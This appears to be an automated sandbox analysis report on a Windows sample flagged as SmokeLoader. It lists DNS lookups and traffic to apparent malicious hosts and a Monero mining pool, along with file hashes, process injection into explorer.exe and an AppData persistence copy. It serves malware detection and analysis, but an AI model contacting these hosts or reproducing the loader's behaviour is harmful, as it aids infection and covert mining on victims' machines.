                                                                                                                                                                                                            Jan 13, 2022 23:29:11.521457911 CET4976280192.168.2.693.189.42.167
                                                                                                                                                                                                            Jan 13, 2022 23:29:11.529535055 CET4976380192.168.2.6185.186.142.166
                                                                                                                                                                                                            Jan 13, 2022 23:29:11.571800947 CET804976293.189.42.167192.168.2.6
                                                                                                                                                                                                            Jan 13, 2022 23:29:11.583322048 CET8049763185.186.142.166192.168.2.6
                                                                                                                                                                                                            Jan 13, 2022 23:29:12.094142914 CET4976380192.168.2.6185.186.142.166
                                                                                                                                                                                                            Jan 13, 2022 23:29:12.148092031 CET8049763185.186.142.166192.168.2.6
                                                                                                                                                                                                            Jan 13, 2022 23:29:12.656721115 CET4976380192.168.2.6185.186.142.166
                                                                                                                                                                                                            Jan 13, 2022 23:29:12.710422039 CET8049763185.186.142.166192.168.2.6
                                                                                                                                                                                                            Jan 13, 2022 23:29:12.758996964 CET4976480192.168.2.693.189.42.167
                                                                                                                                                                                                            Jan 13, 2022 23:29:12.809745073 CET804976493.189.42.167192.168.2.6
                                                                                                                                                                                                            Jan 13, 2022 23:29:12.810252905 CET4976480192.168.2.693.189.42.167
                                                                                                                                                                                                            Jan 13, 2022 23:29:12.810374022 CET4976480192.168.2.693.189.42.167
                                                                                                                                                                                                            Jan 13, 2022 23:29:12.810390949 CET4976480192.168.2.693.189.42.167
                                                                                                                                                                                                            Jan 13, 2022 23:29:12.861114979 CET804976493.189.42.167192.168.2.6
                                                                                                                                                                                                            Jan 13, 2022 23:29:12.889929056 CET804976493.189.42.167192.168.2.6
                                                                                                                                                                                                            Jan 13, 2022 23:29:12.891474009 CET4976480192.168.2.693.189.42.167
                                                                                                                                                                                                            Jan 13, 2022 23:29:12.891846895 CET4976480192.168.2.693.189.42.167
                                                                                                                                                                                                            Jan 13, 2022 23:29:12.920666933 CET4976580192.168.2.693.189.42.167
                                                                                                                                                                                                            Jan 13, 2022 23:29:12.944318056 CET804976493.189.42.167192.168.2.6
                                                                                                                                                                                                            Jan 13, 2022 23:29:12.971151114 CET804976593.189.42.167192.168.2.6
                                                                                                                                                                                                            Jan 13, 2022 23:29:12.971775055 CET4976580192.168.2.693.189.42.167
                                                                                                                                                                                                            Jan 13, 2022 23:29:12.971883059 CET4976580192.168.2.693.189.42.167
                                                                                                                                                                                                            Jan 13, 2022 23:29:12.971903086 CET4976580192.168.2.693.189.42.167
                                                                                                                                                                                                            Jan 13, 2022 23:29:13.022485018 CET804976593.189.42.167192.168.2.6
                                                                                                                                                                                                            Jan 13, 2022 23:29:13.055574894 CET804976593.189.42.167192.168.2.6
                                                                                                                                                                                                            Jan 13, 2022 23:29:13.055663109 CET4976580192.168.2.693.189.42.167
                                                                                                                                                                                                            Jan 13, 2022 23:29:13.055943966 CET4976580192.168.2.693.189.42.167
                                                                                                                                                                                                            Jan 13, 2022 23:29:13.084707022 CET4976780192.168.2.693.189.42.167
                                                                                                                                                                                                            Jan 13, 2022 23:29:13.106786013 CET804976593.189.42.167192.168.2.6
                                                                                                                                                                                                            Jan 13, 2022 23:29:13.136225939 CET804976793.189.42.167192.168.2.6
                                                                                                                                                                                                            Jan 13, 2022 23:29:13.137375116 CET4976780192.168.2.693.189.42.167
                                                                                                                                                                                                            Jan 13, 2022 23:29:13.137502909 CET4976780192.168.2.693.189.42.167
                                                                                                                                                                                                            Jan 13, 2022 23:29:13.198638916 CET804976793.189.42.167192.168.2.6
                                                                                                                                                                                                            Jan 13, 2022 23:29:13.198667049 CET804976793.189.42.167192.168.2.6
                                                                                                                                                                                                            Jan 13, 2022 23:29:13.198684931 CET804976793.189.42.167192.168.2.6
                                                                                                                                                                                                            Jan 13, 2022 23:29:13.198704004 CET804976793.189.42.167192.168.2.6
                                                                                                                                                                                                            Jan 13, 2022 23:29:13.198723078 CET804976793.189.42.167192.168.2.6
                                                                                                                                                                                                            Jan 13, 2022 23:29:13.198745966 CET804976793.189.42.167192.168.2.6

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                                                                                                                                                                                            Jan 13, 2022 23:29:57.553836107 CET192.168.2.68.8.8.80x2622Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:57.717216969 CET192.168.2.68.8.8.80x76e9Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:57.915946960 CET192.168.2.68.8.8.80x1d4Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:58.091353893 CET192.168.2.68.8.8.80xc4e7Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:58.271456957 CET192.168.2.68.8.8.80x8162Standard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:04.255681038 CET192.168.2.68.8.8.80xe801Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:04.428649902 CET192.168.2.68.8.8.80x644fStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:04.612395048 CET192.168.2.68.8.8.80x337dStandard query (0)a0621298.xsph.ruA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:07.153584003 CET192.168.2.68.8.8.80x1480Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:07.313498974 CET192.168.2.68.8.8.80x12c4Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:07.470238924 CET192.168.2.68.8.8.80x792fStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:07.633542061 CET192.168.2.68.8.8.80xb05bStandard query (0)transfer.shA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:07.855351925 CET192.168.2.68.8.8.80x1c03Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:08.050093889 CET192.168.2.68.8.8.80x7dd8Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:08.216840982 CET192.168.2.68.8.8.80xe947Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:08.382360935 CET192.168.2.68.8.8.80x1d12Standard query (0)transfer.shA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:10.574676037 CET192.168.2.68.8.8.80xdd13Standard query (0)a0621298.xsph.ruA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:12.392607927 CET192.168.2.68.8.8.80x3462Standard query (0)a0621298.xsph.ruA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:14.302822113 CET192.168.2.68.8.8.80x69b2Standard query (0)a0621298.xsph.ruA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:15.189268112 CET192.168.2.68.8.8.80x5615Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:15.711497068 CET192.168.2.68.8.8.80x3ce5Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:15.904176950 CET192.168.2.68.8.8.80x4628Standard query (0)a0621298.xsph.ruA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:16.051207066 CET192.168.2.68.8.8.80xeb08Standard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:17.567692995 CET192.168.2.68.8.8.80x1Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:17.798347950 CET192.168.2.68.8.8.80x1113Standard query (0)a0621298.xsph.ruA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:19.158591032 CET192.168.2.68.8.8.80x64a3Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:19.324814081 CET192.168.2.68.8.8.80x2406Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:19.491065025 CET192.168.2.68.8.8.80x35e3Standard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:22.573787928 CET192.168.2.68.8.8.80xc9d2Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:22.883111954 CET192.168.2.68.8.8.80x4664Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:24.475070000 CET192.168.2.68.8.8.80xb01cStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:25.396651030 CET192.168.2.68.8.8.80x53f7Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:28.579149008 CET192.168.2.68.8.8.80x15fStandard query (0)patmushta.infoA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:39.841985941 CET192.168.2.68.8.8.80x9e17Standard query (0)a0621298.xsph.ruA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:42.829236984 CET192.168.2.68.8.8.80xb5ebStandard query (0)bitbucket.orgA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:43.347338915 CET192.168.2.68.8.8.80x8366Standard query (0)a0621298.xsph.ruA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:43.445586920 CET192.168.2.68.8.8.80xd51bStandard query (0)bbuseruploads.s3.amazonaws.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:43.520307064 CET192.168.2.68.8.8.80xf56eStandard query (0)bbuseruploads.s3.amazonaws.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:43.742400885 CET192.168.2.68.8.8.80xd2b2Standard query (0)pool.supportxmr.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:51.994684935 CET192.168.2.68.8.8.80xba00Standard query (0)a0621298.xsph.ruA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:59.390553951 CET192.168.2.68.8.8.80x9ec1Standard query (0)microsoft-com.mail.protection.outlook.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:31:18.783371925 CET192.168.2.68.8.8.80x2c4bStandard query (0)patmushta.infoA (IP address)IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                                                                                                                                                                                            Jan 13, 2022 23:29:50.702033997 CET8.8.8.8192.168.2.60xb436No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:50.871994972 CET8.8.8.8192.168.2.60xfc3No error (0)data-host-coin-8.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:56.366504908 CET8.8.8.8192.168.2.60x61ceNo error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:56.566884041 CET8.8.8.8192.168.2.60x2c1aNo error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:56.761998892 CET8.8.8.8192.168.2.60x708bNo error (0)goo.su104.21.38.221A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:56.761998892 CET8.8.8.8192.168.2.60x708bNo error (0)goo.su172.67.139.105A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:57.206146002 CET8.8.8.8192.168.2.60x5d64No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:57.382162094 CET8.8.8.8192.168.2.60xe9bcNo error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:57.573051929 CET8.8.8.8192.168.2.60x2622No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:57.736783981 CET8.8.8.8192.168.2.60x76e9No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:57.935136080 CET8.8.8.8192.168.2.60x1d4No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:58.109098911 CET8.8.8.8192.168.2.60xc4e7No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:29:58.288562059 CET8.8.8.8192.168.2.60x8162No error (0)data-host-coin-8.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:04.275192022 CET8.8.8.8192.168.2.60xe801No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:04.447892904 CET8.8.8.8192.168.2.60x644fNo error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:04.635010958 CET8.8.8.8192.168.2.60x337dNo error (0)a0621298.xsph.ru141.8.194.74A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:07.170701981 CET8.8.8.8192.168.2.60x1480No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:07.333105087 CET8.8.8.8192.168.2.60x12c4No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:07.491004944 CET8.8.8.8192.168.2.60x792fNo error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:07.651065111 CET8.8.8.8192.168.2.60xb05bNo error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:07.874785900 CET8.8.8.8192.168.2.60x1c03No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:08.069142103 CET8.8.8.8192.168.2.60x7dd8No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:08.235975027 CET8.8.8.8192.168.2.60xe947No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:08.401951075 CET8.8.8.8192.168.2.60x1d12No error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:10.677889109 CET8.8.8.8192.168.2.60xdd13No error (0)a0621298.xsph.ru141.8.194.74A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:12.421346903 CET8.8.8.8192.168.2.60x3462No error (0)a0621298.xsph.ru141.8.194.74A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:14.320513964 CET8.8.8.8192.168.2.60x69b2No error (0)a0621298.xsph.ru141.8.194.74A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:15.208156109 CET8.8.8.8192.168.2.60x5615No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:15.729043007 CET8.8.8.8192.168.2.60x3ce5No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:15.923553944 CET8.8.8.8192.168.2.60x4628No error (0)a0621298.xsph.ru141.8.194.74A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:16.341681957 CET8.8.8.8192.168.2.60xeb08No error (0)data-host-coin-8.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:17.590646029 CET8.8.8.8192.168.2.60x1No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:17.590646029 CET8.8.8.8192.168.2.60x1No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:17.590646029 CET8.8.8.8192.168.2.60x1No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:17.590646029 CET8.8.8.8192.168.2.60x1No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:17.590646029 CET8.8.8.8192.168.2.60x1No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:17.815614939 CET8.8.8.8192.168.2.60x1113No error (0)a0621298.xsph.ru141.8.194.74A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:19.175718069 CET8.8.8.8192.168.2.60x64a3No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:19.343470097 CET8.8.8.8192.168.2.60x2406No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:19.510390043 CET8.8.8.8192.168.2.60x35e3No error (0)data-host-coin-8.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:22.593178988 CET8.8.8.8192.168.2.60xc9d2No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:22.902317047 CET8.8.8.8192.168.2.60x4664No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:24.494168997 CET8.8.8.8192.168.2.60xb01cNo error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:25.417500973 CET8.8.8.8192.168.2.60x53f7No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:25.417500973 CET8.8.8.8192.168.2.60x53f7No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:25.417500973 CET8.8.8.8192.168.2.60x53f7No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:25.417500973 CET8.8.8.8192.168.2.60x53f7No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:25.417500973 CET8.8.8.8192.168.2.60x53f7No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:28.691292048 CET8.8.8.8192.168.2.60x15fNo error (0)patmushta.info8.209.67.104A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:39.859559059 CET8.8.8.8192.168.2.60x9e17No error (0)a0621298.xsph.ru141.8.194.74A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:42.850610971 CET8.8.8.8192.168.2.60xb5ebNo error (0)bitbucket.org104.192.141.1A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:43.375211000 CET8.8.8.8192.168.2.60x8366No error (0)a0621298.xsph.ru141.8.194.74A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:43.463148117 CET8.8.8.8192.168.2.60xd51bNo error (0)bbuseruploads.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:43.463148117 CET8.8.8.8192.168.2.60xd51bNo error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:43.463148117 CET8.8.8.8192.168.2.60xd51bNo error (0)s3-w.us-east-1.amazonaws.com54.231.194.41A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:43.539891005 CET8.8.8.8192.168.2.60xf56eNo error (0)bbuseruploads.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:43.539891005 CET8.8.8.8192.168.2.60xf56eNo error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:43.539891005 CET8.8.8.8192.168.2.60xf56eNo error (0)s3-w.us-east-1.amazonaws.com52.217.203.217A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:43.761686087 CET8.8.8.8192.168.2.60xd2b2No error (0)pool.supportxmr.compool-fr.supportxmr.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:43.761686087 CET8.8.8.8192.168.2.60xd2b2No error (0)pool-fr.supportxmr.com149.202.83.171A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:43.761686087 CET8.8.8.8192.168.2.60xd2b2No error (0)pool-fr.supportxmr.com94.23.23.52A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:43.761686087 CET8.8.8.8192.168.2.60xd2b2No error (0)pool-fr.supportxmr.com94.23.247.226A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:43.761686087 CET8.8.8.8192.168.2.60xd2b2No error (0)pool-fr.supportxmr.com37.187.95.110A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:43.761686087 CET8.8.8.8192.168.2.60xd2b2No error (0)pool-fr.supportxmr.com91.121.140.167A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:52.014040947 CET8.8.8.8192.168.2.60xba00No error (0)a0621298.xsph.ru141.8.194.74A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:59.418649912 CET8.8.8.8192.168.2.60x9ec1No error (0)microsoft-com.mail.protection.outlook.com52.101.24.0A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:59.418649912 CET8.8.8.8192.168.2.60x9ec1No error (0)microsoft-com.mail.protection.outlook.com40.93.207.0A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:59.418649912 CET8.8.8.8192.168.2.60x9ec1No error (0)microsoft-com.mail.protection.outlook.com40.93.212.0A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:59.418649912 CET8.8.8.8192.168.2.60x9ec1No error (0)microsoft-com.mail.protection.outlook.com104.47.54.36A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:30:59.418649912 CET8.8.8.8192.168.2.60x9ec1No error (0)microsoft-com.mail.protection.outlook.com40.93.207.1A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2022 23:31:19.102844000 CET8.8.8.8192.168.2.60x2c4bNo error (0)patmushta.info8.209.67.104A (IP address)IN (0x0001)

HTTP Request Dependency Graph

                                                                                                                                                                                                            • qfbgcss.net
                                                                                                                                                                                                            • lxjysfgjrh.org
                                                                                                                                                                                                            • qxnyvqdps.net
                                                                                                                                                                                                            • wcdhabii.org
                                                                                                                                                                                                            • ynptmns.com
                                                                                                                                                                                                            • yjoyannoc.org
                                                                                                                                                                                                            • vsnokv.org
                                                                                                                                                                                                            • wlmasccc.com
                                                                                                                                                                                                            • qalbmnobc.org
                                                                                                                                                                                                            • qmvwr.net
                                                                                                                                                                                                            • fhfjy.com
                                                                                                                                                                                                            • krgodthiqk.net
                                                                                                                                                                                                            • fpepckdf.org
                                                                                                                                                                                                            • ovhmquitm.com
                                                                                                                                                                                                            • jbmqdifhe.com
                                                                                                                                                                                                            • a0621298.xsph.ru
                                                                                                                                                                                                            • fkgaaiey.net
                                                                                                                                                                                                            • kebbk.net
                                                                                                                                                                                                            • hoircbi.org
                                                                                                                                                                                                            • aglrl.com
                                                                                                                                                                                                            • ivytp.com
                                                                                                                                                                                                            • rbokhamk.net
                                                                                                                                                                                                            • 185.163.204.22
                                                                                                                                                                                                            • 185.163.204.24
                                                                                                                                                                                                            • molmwvfdsj.org
                                                                                                                                                                                                            • uqmibnvyi.org
                                                                                                                                                                                                            • cmmwfel.org
                                                                                                                                                                                                            • voeiplb.com
                                                                                                                                                                                                            • xivyfkgciu.net
                                                                                                                                                                                                            • ydjicveig.com
                                                                                                                                                                                                            • mtcpl.com

Code Manipulations

Statistics

Behavior

System Behavior

General

Start time: 23:28:25
Start date: 13/01/2022
Path: C:\Users\user\Desktop\0Cjy7Lkv1A.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\0Cjy7Lkv1A.exe"
Imagebase: 0x400000
File size: 284672 bytes
MD5 hash: EB023C854D3C8A24589E9294FD5D346E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low

General

Start time: 23:28:28
Start date: 13/01/2022
Path: C:\Users\user\Desktop\0Cjy7Lkv1A.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\0Cjy7Lkv1A.exe"
Imagebase: 0x400000
File size: 284672 bytes
MD5 hash: EB023C854D3C8A24589E9294FD5D346E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.419458917.00000000004F0000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.419524662.00000000006A1000.00000004.00020000.sdmp, Author: Joe Security
Reputation: low

General

Start time: 23:28:35
Start date: 13/01/2022
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline: C:\Windows\Explorer.EXE
Imagebase: 0x7ff6f22f0000
File size: 3933184 bytes
MD5 hash: AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000000.404651747.0000000004151000.00000020.00020000.sdmp, Author: Joe Security
Reputation: high

General

Start time: 23:28:40
Start date: 13/01/2022
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase: 0x7ff6b7590000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 23:28:52
Start date: 13/01/2022
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase: 0x7ff6b7590000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 23:29:07
Start date: 13/01/2022
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase: 0x7ff6b7590000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 23:29:09
Start date: 13/01/2022
Path: C:\Users\user\AppData\Roaming\ujhcrda
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Roaming\ujhcrda
Imagebase: 0x400000
File size: 284672 bytes
MD5 hash: EB023C854D3C8A24589E9294FD5D346E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
Reputation: low

General

Start time: 23:29:12
Start date: 13/01/2022
Path: C:\Users\user\AppData\Roaming\ujhcrda
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:C:\Users\user\AppData\Roaming\ujhcrda
                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                            File size:284672 bytes
                                                                                                                                                                                                            MD5 hash:EB023C854D3C8A24589E9294FD5D346E
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000D.00000002.471381402.0000000000460000.00000004.00000001.sdmp, Author: Joe Security
